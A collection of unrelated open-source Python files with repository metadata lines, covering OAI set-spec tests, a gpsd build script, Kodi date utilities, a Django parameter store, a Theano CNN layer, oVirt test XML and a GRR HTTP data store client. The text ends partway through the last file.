observable = Observable()
adoptOaiSetSpecs = AdoptOaiSetSpecs(newSetSpecsFromOriginals=prefixWithCollection)
observer = CallTrace('observer')
observable.addObserver(adoptOaiSetSpecs)
adoptOaiSetSpecs.addObserver(observer)
__callstack_dict__ = {
'collection': 'collection1',
'setSpecs': ['set1']
}
observable.do.addOaiRecord(
identifier='identifier',
setSpecs=['aSet'],
metadataPrefixes=['ese']
)
self.assertEquals(['addOaiRecord'], [m.name for m in observer.calledMethods])
self.assertEquals(
{
'identifier': 'identifier',
'metadataPrefixes': ['ese'],
'setSpecs': ['aSet', 'collection1', 'collection1:set1']
},
observer.calledMethods[0].kwargs
)
def testSetAsIs(self):
observable = Observable()
adoptOaiSetSpecs = AdoptOaiSetSpecs()
observer = CallTrace('observer')
observable.addObserver(adoptOaiSetSpecs)
adoptOaiSetSpecs.addObserver(observer)
__callstack_dict__ = {
'repositoryGroupId': 'x:y%z',
'collection': 'collection1',
'setSpecs': ['set1']
}
observable.do.addOaiRecord(
identifier='identifier',
setSpecs=['aSet'],
metadataPrefixes=['ese']
)
self.assertEquals(['addOaiRecord'], [m.name for m in observer.calledMethods])
self.assertEquals(
{
'identifier': 'identifier',
'metadataPrefixes': ['ese'],
'setSpecs': ['aSet', 'set1']
},
observer.calledMethods[0].kwargs
)
| seecr/dc-erfgeo-enrich | test/adoptoaisetspecstest.py | Python | gpl-2.0 | 4,711 |
# $Id: setup.py 4429 2007-10-17 22:15:06Z ckuethe $
# Creates build/lib.linux-${arch}-${pyvers}/gpspacket.so,
# where ${arch} is an architecture and ${pyvers} is a Python version.
from distutils.core import setup, Extension
import os
import sys
needed_files = ['packet_names.h', 'gpsfake.1', 'gpsprof.1']
created_files = []
if not 'clean' in sys.argv:
if not os.path.exists('gpsd_config.h'):
sys.stderr.write('\nPlease run configure first!\n')
sys.exit(1)
for f_name in needed_files:
if not os.path.exists(f_name):
make_in, make_out = os.popen2('make %s' % f_name)
print make_out.read()
make_out.close()
make_in.close()
created_files.append(f_name)
extension_source = ["gpspacket.c", "packet.c", "isgps.c",
"rtcm.c", "strl.c", "hex.c"]
setup( name="gpspacket",
version="1.0",
ext_modules=[Extension("gpspacket", extension_source)],
py_modules = ['gpsfake','gps'],
data_files=[('bin', ['gpsfake','gpsprof']),
('share/man/man1', ['gpsfake.1','gpsprof.1'])]
)
| gnehzuil/GeoSVR | src/system/lib/gpsd-2.35/setup.py | Python | gpl-2.0 | 1,042 |
""" Class to handle date-parsing and formatting """
# Workaround for http://bugs.python.org/issue8098
import _strptime # pylint: disable=unused-import
from datetime import datetime
import time
class DateUtils(object):
""" Class to handle date-parsing and formatting """
date_format = '%Y-%m-%dT%H:%M:%SZ'
json_date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
kodi_date_format = '%Y-%m-%d %H:%M'
def get_str_date(self, date):
"""
Formats datetime to str of format %Y-%m-%dT%H:%M:%SZ
Arguments
date: datetime
"""
return datetime.strftime(date, self.date_format)
def parse_str_date(self, str_date):
"""
Parse a date of format %Y-%m-%dT%H:%M:%SZ to date
Arguments
str_date: str, %Y-%m-%dT%H:%M:%SZ
"""
return self._parse_str_date(str_date, self.date_format)
def _parse_str_date(self, str_date, date_format):
try:
return datetime.strptime(str_date, date_format)
except TypeError:
return datetime(*(time.strptime(str_date, date_format)[0:6]))
def parse_kodi_date(self, str_date):
if not str_date:
return None
return self._parse_str_date(str_date, '%Y-%m-%d %H:%M:%S')
def get_kodi_date_format(self, str_date):
"""
Returns a date on format %Y-%m-%dT%H:%M:%SZ as %Y-%m-%d %H:%M
"""
parsed_date = self._parse_str_date(str_date, self.json_date_format)
return datetime.strftime(parsed_date, '%Y-%m-%d %H:%M:%S')
| sebastian-steinmann/kodi-repo | src/service.library.video/resources/lib/date_utils.py | Python | mit | 1,538 |
# coding: utf-8
"""
MAGE parameter module models and helpers file.
Useful functions (part of the API) are :
- getParam
- setParam
- getMyParams
- setOrCreateParam
@license: Apache License, Version 2.0
@copyright: 2007-2013 Marc-Antoine Gouillart
@author: Marc-Antoine Gouillart
"""
###############################################################################
##
## Minimalist parameters handling
##
###############################################################################
## Python imports
import sys
## Django imports
from django.db import models
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
##########################################################################
## Exceptions
##########################################################################
class ParamNotFound(Exception):
def __init__(self, kwargs):
self.query = kwargs
def __str__(self):
return u'Parametre mal specifié : %s' % self.query
class DuplicateParam(Exception):
def __init__(self, param):
self.param = param
def __str__(self):
return u'il existe deja un parametre répondant a cette définition : %s' % self.param
##########################################################################
## Model
##########################################################################
# Funny hack to create a "dynamic" static list...
def choice_list():
for application in settings.INSTALLED_APPS:
app_name = application.split('.')[0]
if app_name in ('django', 'crispy_forms', 'debug_toolbar'): continue
yield (app_name, app_name)
class MageParam(models.Model):
key = models.CharField(max_length=30, verbose_name=u'clé')
app = models.CharField(max_length=5, verbose_name=u'application', choices=choice_list())
value = models.CharField(max_length=100, verbose_name=u'valeur')
description = models.CharField(max_length=200, blank=True, null=True, verbose_name=u'description')
default_value = models.CharField(max_length=100, blank=True, null=True, verbose_name=u'valeur par défaut')
model = models.ForeignKey(ContentType, blank=True, null=True, verbose_name=u'modèle concerné', on_delete=models.CASCADE)
axis1 = models.CharField(max_length=30, verbose_name=u'classification optionnelle', blank=True, null=True)
restricted = models.BooleanField(default=False)
def __str__(self):
return u'[%s] %s : %s' % (self.app, self.key, self.value)
class Meta:
verbose_name = u'paramètre global'
verbose_name_plural = u'paramètres globaux'
ordering = ['app', 'key', ]
unique_together = [('key', 'app', 'model', 'axis1'), ]
##########################################################################
## API
##########################################################################
def getParam(key, **others):
"""
Retrieves a parameter.
This function hits the database, so it should be called as little as possible.
@return: the parameter value as a string (unicode).
@raise ParamNotFound: if the param cannot be found, or if multiple params were found.
"""
if others and 'app' in others: app = others['app']
else: app = sys._getframe(1).f_globals['__name__'].split('.')[0]
filters = others or {}
filters['app'] = app
filters['key'] = key
try:
return MageParam.objects.get(**filters).value
except (MageParam.DoesNotExist, MageParam.MultipleObjectsReturned):
raise ParamNotFound(filters)
def setOrCreateParam(key, value, **others):
if others and 'app' in others: app = others['app']
else: app = sys._getframe(1).f_globals['__name__'].split('.')[0]
args = others or {}
args['key'] = key
args['app'] = app
prm = MageParam.objects.get_or_create(**args)[0]
prm.value = value
prm.save()
def setParam(key, value, **others):
"""
Creates a new parameter
@return: nothing.
@raise DjangoExceptions: many Django model exceptions may be raised in this function
@raise DuplicateParam: in case of unicity constraint violation
"""
if others and 'app' in others: app = others['app']
else: app = sys._getframe(1).f_globals['__name__'].split('.')[0]
args = others or {}
args['key'] = key
args['app'] = app
args['value'] = value
try:
prm = getParam(**args) # Compulsory, as constraints on nullable fields may not be implemented in the db.
except ParamNotFound:
p = MageParam(**args)
p.save()
return
raise DuplicateParam(prm)
def getMyParams():
"""
@return: all the parameters of an application
"""
app = sys._getframe(1).f_globals['__name__'].split('.')[0]
return MageParam.objects.filter(app=app)
def getAllParams():
"""
@return: all the parameters of all applications
"""
return MageParam.objects.all()
| marcanpilami/MAGE | ref/models/parameters.py | Python | apache-2.0 | 5,027 |
import theano.tensor as T
import theano
from theano.tensor.nnet import conv
from theano.tensor.signal import pool
import numpy as np
class CNNLayerWithMaxPool(object):
def __init__(self,rng,input,filter_shape,im_shape,pooling=(2,2)):
self.input = input
fin = filter_shape[1]*filter_shape[2]*filter_shape[3]
fout = filter_shape[0]*filter_shape[2]*filter_shape[3]/(pooling[0]*pooling[1])
self.W = theano.shared(
name='W',
value=np.asarray(
rng.uniform(low=-np.sqrt(6/(fin+fout)),high=np.sqrt(6/(fin+fout)),size=filter_shape),
dtype=theano.config.floatX),
borrow=True
)
self.b = theano.shared(
name='b',
value=np.zeros((filter_shape[0],),dtype=theano.config.floatX),
borrow=True
)
conv_out = conv.conv2d(
input=input,
filters=self.W,
image_shape=im_shape,
filter_shape=filter_shape
)
maxpool_out = pool.pool_2d(
input=conv_out,
ds=pooling,
ignore_border=True
)
self.output = T.tanh(maxpool_out+self.b.dimshuffle('x',0,'x','x'))
self.params = [self.W,self.b]
| raghavgupta0296/Learning-Deep-Learning-Libraries | TheanoCNN/CNNLayer.py | Python | mit | 1,296 |
#encoding:utf-8
__authors__ = ['wei keke']
__version__ = "V0.1"
'''
# ChangeLog:
#---------------------------------------------------------------------------------
# Version Date Desc Author
#---------------------------------------------------------------------------------
# V0.1 2014/10/17 初始版本
#---------------------------------------------------------------------------------
'''
import TestData.Network.ITC06_Setup as ModuleData
from TestAPIs.DataCenterAPIs import DataCenterAPIs
'''
@note: PreData
'''
dc_name = ModuleData.dc_name
dc_id = DataCenterAPIs().getDataCenterIdByName(ModuleData.dc_name)
nw_name = 'network001'
nw_info = '''
<network>
<name>%s</name>
<data_center id= "%s"/>
</network>
''' %(nw_name,dc_id)
'''
@note:TestData
'''
new_nw_name = 'network002'
update_info = '''
<network>
<name>%s</name>
<description>lalala</description>
<mtu>2000</mtu>
</network>
'''%new_nw_name
'''
@note: ExpectedData
'''
expected_status_code = 200 | faylau/oVirt3.3WebAPITest | src/TestData/Network/ITC06010401_UpdateNetwork.py | Python | apache-2.0 | 1,115 |
#!/usr/bin/env python
"""A remote data store using HTTP."""
import base64
import binascii
import httplib
import random
import re
import socket
import threading
import time
import urlparse
import logging
from grr.lib import access_control
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import rdfvalue
from grr.lib import utils
from grr.lib.data_stores import common
from grr.lib.rdfvalues import data_server as rdf_data_server
from grr.lib.rdfvalues import data_store as rdf_data_store
from grr.lib.rdfvalues import protodict as rdf_protodict
from grr.server.data_server import auth
from grr.server.data_server import constants
from grr.server.data_server import utils as sutils
def CheckResponseStatus(response):
"""Catch error conditions from the response and raise them."""
# Common case exit early.
if response.status == rdf_data_store.DataStoreResponse.Status.OK:
return response
elif (response.status ==
rdf_data_store.DataStoreResponse.Status.AUTHORIZATION_DENIED):
raise access_control.UnauthorizedAccess(response.status_desc,
response.failed_subject)
elif response.status == rdf_data_store.DataStoreResponse.Status.TIMEOUT_ERROR:
raise data_store.TimeoutError(response.status_desc)
elif (response.status ==
rdf_data_store.DataStoreResponse.Status.DATA_STORE_ERROR):
raise data_store.Error(response.status_desc)
raise data_store.Error("Unknown error %s" % response.status_desc)
class Error(data_store.Error):
"""Base class for remote data store errors."""
pass
class HTTPDataStoreError(Error):
"""Raised when there is a critical error in the remote data store."""
pass
class DataServerConnection(object):
"""Represents one connection to a data server."""
def __init__(self, server):
self.conn = None
self.sock = None
self.lock = threading.Lock()
self.server = server
# Mark pending requests and subjects that are scheduled to change on
# the database.
self.requests = []
self._DoConnection()
def Address(self):
return self.server.Address()
def Port(self):
return self.server.Port()
def _ReadExactly(self, n):
ret = ""
left = n
while left:
data = self.sock.recv(left)
if not data:
raise IOError("Expected %d bytes, got EOF after %d" % (n, len(ret)))
ret += data
left = n - len(ret)
return ret
def _ReadReply(self):
try:
replylen_str = self._ReadExactly(sutils.SIZE_PACKER.size)
replylen = sutils.SIZE_PACKER.unpack(replylen_str)[0]
reply = self._ReadExactly(replylen)
response = rdf_data_store.DataStoreResponse.FromSerializedString(reply)
CheckResponseStatus(response)
return response
except (socket.error, socket.timeout, IOError) as e:
logging.warning("Cannot read reply from server %s:%d : %s",
self.Address(), self.Port(), e)
return None
def _Sync(self):
"""Read responses from the pending requests."""
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.read_timeout"])
while self.requests:
response = self._ReadReply()
if not response:
# Could not read response. Let's exit and force a reconnection
# followed by a replay.
# TODO(user): Maybe we need to assign an unique ID for each
# request so that the server knows which ones were already applied.
return False
self.requests.pop()
return True
def _SendRequest(self, command):
request_str = command.SerializeToString()
request_body = sutils.SIZE_PACKER.pack(len(request_str)) + request_str
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.send_timeout"])
try:
self.sock.sendall(request_body)
return True
except (socket.error, socket.timeout):
logging.warning("Could not send request to server %s:%d",
self.Address(), self.Port())
return False
def _Reconnect(self):
"""Reconnect to the data server."""
try:
if self.sock:
self.sock.close()
except socket.error:
pass
try:
if self.conn:
self.conn.close()
except httplib.HTTPException:
pass
try:
self.conn = httplib.HTTPConnection(self.Address(), self.Port())
username = config_lib.CONFIG.Get("HTTPDataStore.username")
password = config_lib.CONFIG.Get("HTTPDataStore.password")
if not username:
raise HTTPDataStoreError("HTTPDataStore.username not provided")
if not password:
raise HTTPDataStoreError("HTTPDataStore.password not provided")
# We ask the server for a nonce.
self.conn.request("POST", "/client/handshake", "", {})
response = self.conn.getresponse()
if response.status != constants.RESPONSE_OK:
logging.warning("Could not handshake the server %s:%d",
self.Address(), self.Port())
return False
# Generate the authentication token.
size_nonce = int(response.getheader("Content-Length"))
nonce = response.read(size_nonce)
rdf_token = auth.NonceStore.GenerateAuthToken(nonce, username, password)
token = rdf_token.SerializeToString()
# We trick HTTP here and use the underlying socket to pipeline requests.
headers = {"Content-Length": len(token)}
self.conn.request("POST", "/client/start", token, headers)
self.sock = self.conn.sock
# Confirm handshake.
self.sock.setblocking(1)
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.login_timeout"])
ack = self._ReadExactly(3)
if ack == "IP\n":
raise HTTPDataStoreError("Invalid data server username/password.")
if ack != "OK\n":
return False
logging.info("Connected to data server %s:%d",
self.Address(), self.Port())
return True
except httplib.HTTPException as e:
logging.warning("Httplib problem when connecting to %s:%d: %s",
self.Address(), self.Port(), str(e))
return False
except (socket.error, socket.timeout, IOError) as e:
logging.warning("Socket problem when connecting to %s:%d: %s",
self.Address(), self.Port(), str(e))
return False
return False
def _ReplaySync(self):
"""Send all the requests again."""
if self.requests:
logging.info("Replaying the failed requests")
while self.requests:
req = self.requests[-1]
if not self._SendRequest(req):
return False
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.replay_timeout"])
response = self._ReadReply()
if not response:
# Could not read response. Let's exit and force a reconnection
# followed by a replay.
# TODO(user): Maybe we need to assign an unique ID for each
# request so that the server knows which ones were already applied.
return False
self.requests.pop()
return True
def _DoConnection(self):
"""Cleanups the current connection and creates another one."""
started = time.time()
while True:
if self._Reconnect() and self._ReplaySync():
break
else:
logging.warning("Had to connect to %s:%d but failed. Trying again...",
self.Address(), self.Port())
# Sleep for some time before trying again.
time.sleep(config_lib.CONFIG["HTTPDataStore.retry_time"])
if time.time() - started >= config_lib.CONFIG[
"HTTPDataStore.reconnect_timeout"]:
raise HTTPDataStoreError("Could not connect to %s:%d. Giving up." %
(self.Address(), self.Port()))
def _RedoConnection(self):
logging.warning("Attempt to reconnect with %s:%d",
self.Address(), self.Port())
self._DoConnection()
@utils.Synchronized
def MakeRequestAndContinue(self, command, unused_subject):
"""Make request but do not sync with the data server."""
while not self._SendRequest(command):
self._RedoConnection()
self.requests.insert(0, command)
return None
@utils.Synchronized
def SyncAndMakeRequest(self, command):
"""Make a request to the data server and return the response."""
if not self._Sync():
# Must reconnect and resend requests.
self._RedoConnection()
# At this point, we have a synchronized connection.
while not self._SendRequest(command):
self._RedoConnection()
self.sock.settimeout(config_lib.CONFIG["HTTPDataStore.read_timeout"])
response = self._ReadReply()
if not response:
# Must reconnect and resend the request.
while True:
self._RedoConnection()
if not self._SendRequest(command):
continue
response = self._ReadReply()
if response:
break
return response
@utils.Synchronized
def Sync(self):
if self._Sync():
return True
self._RedoConnection()
return self._Sync()
def NumPendingRequests(self):
return len(self.requests)
def Close(self):
self.conn.close()
class DataServer(object):
"""A DataServer object contains connections a data server."""
def __init__(self, addr, port):
self.addr = addr
self.port = port
self.conn = httplib.HTTPConnection(self.Address(), self.Port())
self.lock = threading.Lock()
self.max_connections = config_lib.CONFIG["Dataserver.max_connections"]
# Start with a single connection.
self.connections = [DataServerConnection(self)]
def Port(self):
return self.port
def Address(self):
return self.addr
def Close(self):
for conn in self.connections:
conn.Close()
self.connections = []
if self.conn:
self.conn.close()
self.conn = None
@utils.Synchronized
def Sync(self):
for conn in self.connections:
# TODO(user): Consider adding error handling here.
conn.Sync()
@utils.Synchronized
def GetConnection(self):
"""Return a connection to the data server."""
best = min(self.connections, key=lambda x: x.NumPendingRequests())
if best.NumPendingRequests():
if len(self.connections) == self.max_connections:
# Too many connections, use this one.
return best
new = DataServerConnection(self)
self.connections.append(new)
return new
else:
return best
# Attempt to get one connection with no pending requests.
return self.connections[0]
def _FetchMapping(self):
"""Attempt to fetch mapping from the data server."""
try:
self.conn.request("POST", "/client/mapping")
res = self.conn.getresponse()
if res.status != constants.RESPONSE_OK:
return None
return res.read()
except httplib.HTTPException:
logging.warning("Could not connect server %s:%d",
self.Address(), self.Port())
return None
def LoadMapping(self):
"""Load mapping from the data server."""
started = time.time()
while True:
data = self._FetchMapping()
if data:
mapping = rdf_data_server.DataServerMapping.FromSerializedString(data)
return mapping
if time.time() - started > config_lib.CONFIG[
"HTTPDataStore.reconnect_timeout"]:
raise HTTPDataStoreError("Could not get server mapping from data "
"server at %s:%d." %
(self.Address(), self.Port()))
time.sleep(config_lib.CONFIG["HTTPDataStore.retry_time"])
class RemoteInquirer(object):
"""Class that holds connections to all data servers."""
mapping = None
def __init__(self):
# Create a connection to all data servers
server_list = config_lib.CONFIG["Dataserver.server_list"]
if not server_list:
raise HTTPDataStoreError("List of data servers is not available.")
self.servers = []
for location in server_list:
loc = urlparse.urlparse(location, scheme="http")
addr = loc.hostname
port = loc.port
self.servers.append(DataServer(addr, port))
self.mapping_server = random.choice(self.servers)
self.mapping = self.mapping_server.LoadMapping()
if len(self.mapping.servers) != len(server_list):
logging.warning("There is a mismatch between the data "
"servers and the configuration file. '%s' != '%s'",
self.mapping.servers, server_list)
raise HTTPDataStoreError("There is a mismatch between the data "
"servers and the configuration file.")
for i, serv in enumerate(self.mapping.servers):
target = self.servers[i]
if target.Port() != serv.port:
logging.warning("There is a mismatch between the data "
"servers and the configuration file. '%s' != '%s'",
self.mapping.servers, server_list)
raise HTTPDataStoreError("There is a mismatch between the data "
"servers and the configuration file.")
def MapKey(self, key):
"""Return the data server responsible for a given key."""
sid = sutils.MapKeyToServer(self.mapping, key)
return self.servers[sid]
def GetPathing(self):
return self.GetMapping().pathing
def RenewMapping(self):
self.mapping = self.mapping_server.LoadMapping()
return self.mapping
def GetMapping(self):
return self.mapping
def Flush(self):
for serv in self.servers:
serv.Sync()
def CloseConnections(self):
for serv in self.servers:
serv.Close()
class RemoteMappingCache(utils.FastStore):
"""A local cache for mappings between paths and data servers."""
def __init__(self, size):
super(RemoteMappingCache, self).__init__(size)
self.inquirer = RemoteInquirer()
self.path_regexes = [re.compile(x) for x in self.inquirer.GetPathing()]
def KillObject(self, obj):
pass
def GetInquirer(self):
return self.inquirer
@utils.Synchronized
def Get(self, subject):
"""This will create the object if needed so should not fail."""
filename, directory = common.ResolveSubjectDestination(subject,
self.path_regexes)
key = common.MakeDestinationKey(directory, filename)
try:
return super(RemoteMappingCache, self).Get(key)
except KeyError:
data_server = self.inquirer.MapKey(key)
super(RemoteMappingCache, self).Put(key, data_server)
return data_server
def AllDatabases(self):
for server in self.inquirer.servers:
yield server
def GetPrefix(self, prefix):
"""Yields all databases which could contain records begining with prefix."""
components = common.Components(prefix)
components = [common.ConvertStringToFilename(x) for x in components]
path_prefix = utils.JoinPath(*components)
if path_prefix == "/":
path_prefix = ""
for regex in self.path_regexes:
result = common.EvaluatePrefix(path_prefix, regex)
if result == "MATCH":
yield self.Get(prefix)
return
if result == "POSSIBLE":
for data_server in self.AllDatabases():
yield data_server
return
yield self.Get(prefix)
class HTTPDataStore(data_store.DataStore):
"""A data store which calls a remote server."""
cache = None
inquirer = None
def __init__(self):
super(HTTPDataStore, self).__init__()
self.cache = RemoteMappingCache(1000)
self.inquirer = self.cache.GetInquirer()
self._ComputeNewSize(self.inquirer.GetMapping(), time.time())
def GetServer(self, subject):
return self.cache.Get(subject).GetConnection()
def GetServersForPrefix(self, prefix):
for s in self.cache.GetPrefix(prefix):
yield s.GetConnection()
def TimestampSpecFromTimestamp(self, timestamp):
"""Create a timestamp spec from a timestamp value.
Args:
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end).
Returns:
An rdfvalue.TimestampSpec() instance.
"""
if timestamp is None:
all_ts = rdf_data_store.TimestampSpec.Type.ALL_TIMESTAMPS
return rdf_data_store.TimestampSpec(type=all_ts)
if timestamp in (rdf_data_store.TimestampSpec.Type.ALL_TIMESTAMPS,
rdf_data_store.TimestampSpec.Type.NEWEST_TIMESTAMP):
return rdf_data_store.TimestampSpec(type=timestamp)
if timestamp == self.NEWEST_TIMESTAMP:
newest = rdf_data_store.TimestampSpec.Type.NEWEST_TIMESTAMP
return rdf_data_store.TimestampSpec(type=newest)
if isinstance(timestamp, (list, tuple)):
start, end = timestamp
return rdf_data_store.TimestampSpec(
start=start,
end=end,
type=rdf_data_store.TimestampSpec.Type.RANGED_TIME)
return rdf_data_store.TimestampSpec(
start=timestamp, type=rdf_data_store.TimestampSpec.Type.SPECIFIC_TIME)
def _MakeSyncRequest(self, request, typ):
return self._MakeRequestSyncOrAsync(request, typ, True)
def _MakeRequestSyncOrAsync(self, request, typ, sync):
subject = request.subject[0]
server = self.GetServer(subject)
cmd = rdf_data_server.DataStoreCommand(command=typ, request=request)
if sync:
return server.SyncAndMakeRequest(cmd)
else:
return server.MakeRequestAndContinue(cmd, subject)
def _MakeRequestsForPrefix(self, prefix, typ, request):
cmd = rdf_data_server.DataStoreCommand(command=typ, request=request)
for server in self.GetServersForPrefix(prefix):
yield server.SyncAndMakeRequest(cmd)
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=True,
token=None):
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
if isinstance(attributes, basestring):
raise ValueError(
"String passed to DeleteAttributes (non string iterable expected).")
# Set timestamp.
start = start or 0
if end is None:
end = (2**63) - 1 # sys.maxint
request.timestamp = rdf_data_store.TimestampSpec(
start=start,
end=end,
type=rdf_data_store.TimestampSpec.Type.RANGED_TIME)
if token:
request.token = token
if sync:
request.sync = sync
for attr in attributes:
request.values.Append(attribute=attr)
typ = rdf_data_server.DataStoreCommand.Command.DELETE_ATTRIBUTES
self._MakeRequestSyncOrAsync(request, typ, sync)
def DeleteSubject(self, subject, sync=False, token=None):
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
if token:
request.token = token
typ = rdf_data_server.DataStoreCommand.Command.DELETE_SUBJECT
self._MakeRequestSyncOrAsync(request, typ, sync)
def _MakeRequest(self,
subjects,
attributes,
timestamp=None,
token=None,
limit=None):
if isinstance(attributes, basestring):
attributes = [attributes]
request = rdf_data_store.DataStoreRequest(subject=subjects)
if limit:
request.limit = limit
token = token or data_store.default_token
if token:
request.token = token
if timestamp is not None:
request.timestamp = self.TimestampSpecFromTimestamp(timestamp)
for attribute in attributes:
request.values.Append(attribute=attribute)
return request
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None,
token=None):
"""MultiResolvePrefix."""
self.security_manager.CheckDataStoreAccess(
token, subjects, self.GetRequiredResolveAccess(attribute_prefix))
typ = rdf_data_server.DataStoreCommand.Command.MULTI_RESOLVE_PREFIX
results = {}
remaining_limit = limit
for subject in subjects:
request = self._MakeRequest(
[subject],
attribute_prefix,
timestamp=timestamp,
token=token,
limit=remaining_limit)
response = self._MakeSyncRequest(request, typ)
if response.results:
result_set = response.results[0]
values = [(pred, self._Decode(value), ts)
for (pred, value, ts) in result_set.payload]
if limit:
if len(values) >= remaining_limit:
results[subject] = values[:remaining_limit]
return results.iteritems()
remaining_limit -= len(values)
results[subject] = values
return results.iteritems()
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn=None,
max_records=None,
token=None,
relaxed_order=False):
"""ScanAttribute."""
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
self.security_manager.CheckDataStoreAccess(token, [subject_prefix], "rq")
typ = rdf_data_server.DataStoreCommand.Command.SCAN_ATTRIBUTES
subjects = [subject_prefix]
if after_urn:
subjects.append(after_urn)
request = self._MakeRequest(
subjects, attributes, token=token, limit=max_records)
if relaxed_order:
for response in self._MakeRequestsForPrefix(subject_prefix, typ, request):
for result in response.results:
values = {}
for attribute, (ts, value) in result.payload:
values[attribute] = (ts, self._Decode(value))
yield (result.subject, values)
else:
results = []
for response in self._MakeRequestsForPrefix(subject_prefix, typ, request):
for result in response.results:
values = {}
for attribute, (ts, value) in result.payload:
values[attribute] = (ts, self._Decode(value))
results.append((result.subject, values))
for r in sorted(results, key=lambda x: x[0]):
yield r
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None,
token=None):
"""MultiSet."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(sync=sync)
token = token or data_store.default_token
if token:
request.token = token
request.subject.Append(subject)
now = time.time() * 1000000
if timestamp is None or timestamp == self.NEWEST_TIMESTAMP:
timestamp = now
to_delete = set(to_delete or [])
for attribute in to_delete:
if attribute not in values:
values[attribute] = [(None, 0)]
for k, seq in values.items():
for v in seq:
if isinstance(v, basestring):
element_timestamp = timestamp
else:
try:
v, element_timestamp = v
except (TypeError, ValueError):
element_timestamp = timestamp
option = rdf_data_store.DataStoreValue.Option.DEFAULT
if replace or k in to_delete:
option = rdf_data_store.DataStoreValue.Option.REPLACE
new_value = request.values.Append(
attribute=utils.SmartUnicode(k), option=option)
if element_timestamp is None:
element_timestamp = now
new_value.timestamp = self.TimestampSpecFromTimestamp(element_timestamp)
if v is not None:
new_value.value.SetValue(v)
typ = rdf_data_server.DataStoreCommand.Command.MULTI_SET
self._MakeRequestSyncOrAsync(request, typ, sync)
def ResolveMulti(self,
subject,
attributes,
timestamp=None,
limit=None,
token=None):
"""ResolveMulti."""
self.security_manager.CheckDataStoreAccess(
token, [subject], self.GetRequiredResolveAccess(attributes))
request = self._MakeRequest(
[subject], attributes, timestamp=timestamp, limit=limit, token=token)
typ = rdf_data_server.DataStoreCommand.Command.RESOLVE_MULTI
response = self._MakeSyncRequest(request, typ)
results = []
for result in response.results:
for (attribute, value, timestamp) in result.payload:
results.append((attribute, self._Decode(value), timestamp))
return results
def _Decode(self, value):
"""Decodes strings from serialized responses."""
result = value
if isinstance(value, (tuple, list)):
try:
base64value, one = value
if one == 1:
result = base64.decodestring(base64value)
except (ValueError, binascii.Error):
pass
return result
def DBSubjectLock(self, subject, lease_time=None, token=None):
"""We do not support locks directly."""
return HTTPDBSubjectLock(self, subject, lease_time=lease_time, token=token)
def LockSubject(self, subject, lease_time, token):
"""Locks a specific subject."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
specific = rdf_data_store.TimestampSpec.Type.SPECIFIC_TIME
request.timestamp = rdf_data_store.TimestampSpec(
start=lease_time, type=specific)
if token:
request.token = token
typ = rdf_data_server.DataStoreCommand.Command.LOCK_SUBJECT
response = self._MakeSyncRequest(request, typ)
if not response.results:
return None
result = response.results[0]
if not result.values:
return None
return result.values[0].value.string
def ExtendSubjectLock(self, subject, transid, lease_time, token):
"""Extends lock of subject."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
specific = rdf_data_store.TimestampSpec.Type.SPECIFIC_TIME
request.timestamp = rdf_data_store.TimestampSpec(
start=lease_time, type=specific)
if token:
request.token = token
blob = rdf_protodict.DataBlob(string=transid)
value = rdf_data_store.DataStoreValue(value=blob)
request.values.Append(value)
typ = rdf_data_server.DataStoreCommand.Command.EXTEND_SUBJECT
response = self._MakeSyncRequest(request, typ)
if not response.results:
return None
result = response.results[0]
if not result.values:
return None
value = result.values[0].value.string
return transid if transid == value else None
def UnlockSubject(self, subject, transid, token):
"""Unlocks subject using lock id."""
self.security_manager.CheckDataStoreAccess(token, [subject], "w")
request = rdf_data_store.DataStoreRequest(subject=[subject])
if token:
request.token = token
blob = rdf_protodict.DataBlob(string=transid)
value = rdf_data_store.DataStoreValue(value=blob)
request.values.Append(value)
# We do not care about the server response.
typ = rdf_data_server.DataStoreCommand.Command.UNLOCK_SUBJECT
self._MakeSyncRequest(request, typ)
return transid
def Flush(self):
super(HTTPDataStore, self).Flush()
if self.inquirer:
self.inquirer.Flush()
def CloseConnections(self):
if self.inquirer:
self.inquirer.CloseConnections()
def _ComputeNewSize(self, mapping, new_time):
self.last_size = 0
for serv in mapping.servers:
self.last_size += serv.state.size
self.last_size_update = new_time
def Size(self):
"""Get size of data store."""
now = time.time()
if now < self.last_size_update + 60:
return self.last_size
mapping = self.inquirer.RenewMapping()
self._ComputeNewSize(mapping, now)
return self.last_size
class HTTPDBSubjectLock(data_store.DBSubjectLock):
"""The opensource remote data store subject lock.
We only ensure that two simultaneous locks can not be held on the
same subject.
This means that the first thread which grabs the lock is considered the owner
of the lock. Any subsequent locks on the same subject will fail
immediately with data_store.DBSubjectLockError. NOTE that it is still possible
to manipulate the row without a transaction - this is a design feature!
A lock is considered expired after a certain time.
"""
locked = False
def _Acquire(self, lease_time):
self.transid = self.store.LockSubject(self.subject, lease_time * 1e6,
self.token)
if not self.transid:
raise data_store.DBSubjectLockError("Unable to lock subject %s" %
self.subject)
self.expires = int((time.time() + lease_time) * 1e6)
self.locked = True
def UpdateLease(self, duration):
ret = self.store.ExtendSubjectLock(self.subject, self.transid,
duration * 1e6, self.token)
if ret != self.transid:
raise data_store.DBSubjectLockError("Unable to update the lease on %s" %
self.subject)
self.expires = int((time.time() + duration) * 1e6)
def Release(self):
if self.locked:
